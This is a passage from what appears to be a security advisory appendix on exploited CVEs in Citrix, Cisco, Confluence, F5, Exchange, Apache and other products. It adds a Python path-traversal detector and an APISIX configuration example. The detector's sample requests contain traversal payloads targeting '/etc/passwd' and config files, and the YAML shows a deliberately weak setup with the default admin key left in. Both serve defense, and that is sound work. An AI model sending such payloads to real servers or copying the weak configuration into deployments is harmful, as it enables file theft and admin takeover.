This vulnerability has been modified since it was last analyzed by NVD. It is awaiting reanalysis, which may result in further changes to the information provided. An issue was discovered in Citrix Application Delivery Controller (ADC) and Gateway 10.5, 11.1, 12.0, 12.1, and 13.0. They allow Directory Traversal.

Recommended Mitigations

Detection Methods

N/A

Vulnerable Technologies and Versions

Citrix ADC, Gateway, and SD-WAN WANOP

Table X: Cisco CVE-2021-1497

Cisco CVE-2021-1497 CVSS 3.0: 9.8 (Critical)

Vulnerability Description

Multiple vulnerabilities in the web-based management interface of Cisco HyperFlex HX could allow an unauthenticated, remote malicious actor to perform a command injection against an affected device. For more information about these vulnerabilities, see the Technical details section of this advisory.

Recommended Mitigations

  • Apply Cisco software updates.

Detection Methods

  • Look at the Snort Rules provided by Cisco.

Vulnerable Technologies and Versions

Cisco Hyperflex Hx Data Platform 4.0(2A)

Table XI: Buffalo CVE-2021-20090

Buffalo CVE-2021-20090 CVSS 3.0: 9.8 (Critical)

Vulnerability Description

A path traversal vulnerability in the web interfaces of Buffalo WSR-2533DHPL2 firmware version <= 1.02 and WSR-2533DHP3 firmware version <= 1.24 could allow unauthenticated remote malicious actors to bypass authentication.

Recommended Mitigations

  • Update firmware to latest available version.


Detection Methods

  • N/A

Vulnerable Technologies and Versions

Buffalo Wsr-2533Dhpl2-Bk Firmware

Buffalo Wsr-2533Dhp3-Bk Firmware
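Three of the appendix entries (Pulse Connect Secure in Table III, Citrix ADC in Table IX, and the Buffalo routers in Table XI) share the same root cause: a request path that walks out of the directory the web interface is supposed to serve. The script below is an added example, not code from the advisory or from any of those vendors, and it generalizes beyond the three products: it URL-decodes each request target (repeatedly, so double encoding is handled), walks the path and every query-string value segment by segment, and classifies a request as "escapes_root" when the walk would climb above the starting directory, or as the milder "dot_segment" when ".." appears but stays inside it. The request targets and client addresses are constructed for the example.

```python
import urllib.parse

# Constructed (client_ip, request_target) pairs. Invented for this example;
# they are not from the advisory or any real product.
SAMPLE_REQUESTS = [
    ("198.51.100.4", "/static/css/site.css"),
    ("198.51.100.7", "/download?file=../../../../etc/passwd"),
    ("198.51.100.8", "/cgi-bin/%2e%2e/%2e%2e/conf/app.cfg"),
    ("198.51.100.9", "/api/..%252f..%252fetc%252fhosts"),
    ("198.51.100.5", "/docs/v2/../intro.html"),
]


def url_decode_fully(text, rounds=3):
    """URL-decode up to `rounds` times so double-encoded separators and dots
    are visible; stops early once decoding no longer changes the text."""
    for _ in range(rounds):
        decoded = urllib.parse.unquote(text)
        if decoded == text:
            break
        text = decoded
    return text


def walk_depth(path):
    """Walk `path` segment by segment, treating backslashes as separators.
    Returns "escapes_root" if ".." ever climbs above the starting directory,
    "dot_segment" if ".." occurs but stays inside it, else None."""
    depth = 0
    saw_dot_dot = False
    for segment in path.replace("\\", "/").split("/"):
        if segment == "..":
            saw_dot_dot = True
            depth -= 1
            if depth < 0:
                return "escapes_root"
        elif segment and segment != ".":
            depth += 1
    return "dot_segment" if saw_dot_dot else None


def classify_request(target):
    """Classify one request target (path plus optional query string)."""
    decoded = url_decode_fully(target)
    path, _, query = decoded.partition("?")
    verdicts = [walk_depth(path)]
    for param in query.split("&") if query else []:
        _, _, value = param.partition("=")
        verdicts.append(walk_depth(value))
    if "escapes_root" in verdicts:
        return "escapes_root"
    if "dot_segment" in verdicts:
        return "dot_segment"
    return None


def scan_requests(requests):
    """Return [(client_ip, target, verdict)] for every suspicious request."""
    findings = []
    for client_ip, target in requests:
        verdict = classify_request(target)
        if verdict:
            findings.append((client_ip, target, verdict))
    return findings


if __name__ == "__main__":
    for client_ip, target, verdict in scan_requests(SAMPLE_REQUESTS):
        print(f"{verdict:13s} {client_ip:14s} {target}")
```

The depth walk is deliberately applied to query values as well as the path, because in many of these products the file name arrives as a parameter rather than in the URL path. "dot_segment" findings are common in benign traffic from relative links, so they are best logged rather than alerted on; "escapes_root" against an Internet-facing management interface is worth an immediate look.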

Table XII: Atlassian CVE-2021-26084

Atlassian CVE-2021-26084 CVSS 3.0: 9.8 (Critical)

Vulnerability Description

In affected versions of Confluence Server and Data Center, an OGNL injection vulnerability exists that would allow an unauthenticated malicious actor to execute arbitrary code on a Confluence Server or Data Center instance. The affected versions are before version 6.13.23 and from version 6.14.0 before 7.4.11, version 7.5.0 before 7.11.6, and version 7.12.0 before 7.12.5.

Recommended Mitigations

  • Update Confluence to version 6.13.23, 7.4.11, 7.11.6, 7.12.5, or 7.13.0.
  • Avoid using end-of-life devices.
  • Use Intrusion Detection Systems (IDS).

Detection Methods

N/A

Vulnerable Technologies and Versions

Atlassian Confluence

Atlassian Confluence Server

Atlassian Data Center

Atlassian Jira Data Center

Table XIII: Hikvision CVE-2021-36260

Hikvision CVE-2021-36260 CVSS 3.0: 9.8 (Critical)

Vulnerability Description

A command injection vulnerability exists in the web server of some Hikvision products. Due to insufficient input validation, a malicious actor can exploit the vulnerability to launch a command injection by sending messages containing malicious commands.

Recommended Mitigations

  • Apply the latest firmware updates.

Detection Methods

N/A

Vulnerable Technologies and Versions

Various Hikvision firmware, including the DS, iDS, and PTZ product lines

References

https://www.cisa.gov/uscert/ncas/current-activity/2021/09/28/rce-vulnerability-hikvision-cameras-cve-2021-36260

Table XIV: Sitecore CVE-2021-42237

Sitecore CVE-2021-42237 CVSS 3.0: 9.8 (Critical)

Vulnerability Description

Sitecore XP 7.5 Initial Release to Sitecore XP 8.2 Update-7 is vulnerable to an insecure deserialization attack where it is possible to achieve remote command execution on the machine. No authentication or special configuration is required to exploit this vulnerability.

Recommended Mitigations

  • Update to the latest version.
  • Delete the Report.ashx file from /sitecore/shell/ClientBin/Reporting/Report.ashx.

Detection Methods

  • N/A

Vulnerable Technologies and Versions

Sitecore Experience Platform 7.5, 7.5 Update 1, and 7.5 Update 2

Sitecore Experience Platform 8.0, 8.0 Service Pack 1, and 8.0 Update 1-Update 7

Sitecore Experience Platform 8.0 Service Pack 1

Sitecore Experience Platform 8.1 and Update 1-Update 3

Sitecore Experience Platform 8.2 and Update 1-Update 7

Table XV: F5 CVE-2022-1388

F5 CVE-2022-1388 CVSS 3.0: 9.8 (Critical)

Vulnerability Description

On F5 BIG-IP 16.1.x versions prior to 16.1.2.2, 15.1.x versions prior to 15.1.5.1, 14.1.x versions prior to 14.1.4.6, 13.1.x versions prior to 13.1.5, and all 12.1.x and 11.6.x versions, undisclosed requests may bypass iControl REST authentication. Note: Software versions that have reached End of Technical Support (EoTS) are not evaluated.

Recommended Mitigations

  • Block iControl REST access through the self IP address.
  • Block iControl REST access through the management interface.
  • Modify the BIG-IP httpd configuration.

Detection Methods

N/A

Vulnerable Technologies and Versions

BIG-IP versions:

16.1.0-16.1.2

15.1.0-15.1.5

14.1.0-14.1.4

13.1.0-13.1.4

12.1.0-12.1.6

11.6.1-11.6.5

Table XVI: Apache CVE-2022-24112

Apache CVE-2022-24112 CVSS 3.0: 9.8 (Critical)

Vulnerability Description

A malicious actor can abuse the batch-requests plugin to send requests that bypass the IP restriction of the Admin API. A default configuration of Apache APISIX (with the default API key) is vulnerable to remote code execution. When the admin key has been changed, or the Admin API has been moved to a port different from the data plane, the impact is lower, but there is still a risk of bypassing the IP restriction of the Apache APISIX data plane. The batch-requests plugin contains a check that overrides the client IP with the real remote IP, but due to a bug in the code this check can be bypassed.

Recommended Mitigations

  • In affected versions of Apache APISIX, you can avoid this risk by explicitly commenting out batch-requests in the conf/config.yaml and conf/config-default.yaml files and restarting Apache APISIX.
  • Update to 2.10.4 or 2.12.1.
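The interim mitigation above, shown as a conf/config.yaml fragment; this is an added example, not configuration from the advisory or the Apache APISIX project, and it assumes the 2.x layout in which conf/config.yaml overrides conf/config-default.yaml. Key values are placeholders.

```yaml
# Added example: weak setting beside the corrected one (APISIX 2.x
# layout assumed; key values are placeholders, not real secrets).
#
# Weak: the default admin key is left in place and batch-requests
# stays enabled, so the Admin API IP restriction can be bypassed.
apisix:
  allow_admin:
    - 127.0.0.0/24
  admin_key:
    - name: admin
      key: <DEFAULT-ADMIN-KEY-PLACEHOLDER>
      role: admin
plugins:
  - batch-requests
---
# Hardened: unique admin key and batch-requests commented out.
# Caveat: a plugins list in config.yaml replaces the default list
# entirely, so every plugin still needed must be listed here too.
apisix:
  allow_admin:
    - 127.0.0.0/24
  admin_key:
    - name: admin
      key: <RANDOM-UNIQUE-KEY-PLACEHOLDER>
      role: admin
plugins:
  # - batch-requests
  - limit-req
  - prometheus
```

Restart APISIX after editing; upgrading to 2.10.4 or 2.12.1, as the table states, remains the actual fix.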

Detection Methods

N/A

Vulnerable Technologies and Versions

Apache APISIX between 1.3 and 2.12.1 (excluding 2.12.1)

LTS versions of Apache APISIX between 2.10.0 and 2.10.4

Table XVII: ZOHO CVE-2021-40539

ZOHO CVE-2021-40539 CVSS 3.0: 9.8 (Critical)

Vulnerability Description

Zoho ManageEngine ADSelfService Plus version 6113 and prior is vulnerable to REST API authentication bypass with resultant remote code execution.

Recommended Mitigations

  • Upgrade to the latest version.

Detection Methods

  • Run ManageEngine’s detection tool.
  • Check for specific files and logs.

Vulnerable Technologies and Versions

Zoho Corp ManageEngine ADSelfService Plus

Table XVIII: Microsoft CVE-2021-26857

Microsoft CVE-2021-26857 CVSS 3.0: 7.8 (High)

Vulnerability Description

Microsoft Exchange Server remote code execution vulnerability. This CVE ID differs from CVE-2021-26412, CVE-2021-26854, CVE-2021-26855, CVE-2021-26858, CVE-2021-27065, and CVE-2021-27078.

Recommended Mitigations

  • Update to the latest supported version.
  • Install Microsoft security patch.
  • Use Microsoft Exchange On-Premises Mitigation Tool.

Detection Methods

  • Run Exchange script: https://github.com/microsoft/CSS-Exchange/tree/main/Security.
  • Hashes can be found here: https://www.microsoft.com/security/blog/2021/03/02/hafnium-targeting-exchange-servers/#scan-log.

Vulnerable Technologies and Versions

Microsoft Exchange Servers

Table XIX: Microsoft CVE-2021-26858

Microsoft CVE-2021-26858 CVSS 3.0: 7.8 (High)

Vulnerability Description

Microsoft Exchange Server remote code execution vulnerability. This CVE ID differs from CVE-2021-26412, CVE-2021-26854, CVE-2021-26855, CVE-2021-26857, CVE-2021-27065, and CVE-2021-27078.

Recommended Mitigations

  • Update to the latest supported version.
  • Install Microsoft security patch.
  • Use Microsoft Exchange On-Premises Mitigation Tool.

Detection Methods

Vulnerable Technologies and Versions

Microsoft Exchange Servers

Table XX: Microsoft CVE-2021-27065

Microsoft CVE-2021-27065 CVSS 3.0: 7.8 (High)

Vulnerability Description

Microsoft Exchange Server remote code execution vulnerability. This CVE ID differs from CVE-2021-26412, CVE-2021-26854, CVE-2021-26855, CVE-2021-26857, CVE-2021-26858, and CVE-2021-27078.

Recommended Mitigations

  • Update to the latest supported version.
  • Install Microsoft security patch.
  • Use Microsoft Exchange On-Premises Mitigation Tool.

Detection Methods

Vulnerable Technologies and Versions

Microsoft Exchange Servers

References

https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2021-27065

Table XXI: Apache CVE-2021-41773

Apache CVE-2021-41773 CVSS 3.0: 7.5 (High)

Vulnerability Description

A flaw was found in a change made to path normalization in Apache HTTP Server 2.4.49. A malicious actor could use a path traversal attack to map URLs to files outside the directories configured by Alias-like directives. If files outside of these directories are not protected by the usual default configuration “require all denied,” these requests can succeed. Enabling CGI scripts for these aliased paths could allow for remote code execution. This issue is known to be exploited in the wild. This issue only affects Apache 2.4.49 and not earlier versions. The fix in Apache HTTP Server 2.4.50 is incomplete (see CVE-2021-42013).

Recommended Mitigations

  • Apply update or patch.

Detection Methods

  • Commercially available scanners can detect this CVE.

Vulnerable Technologies and Versions

Apache HTTP Server 2.4.49 and 2.4.50

Fedora Project Fedora 34 and 35

Oracle Instantis Enterprise Track 17.1-17.3

NetApp Cloud Backup

Revisions

  • Initial Publication: October 6, 2022

This product is provided subject to this Notification and this Privacy & Use policy.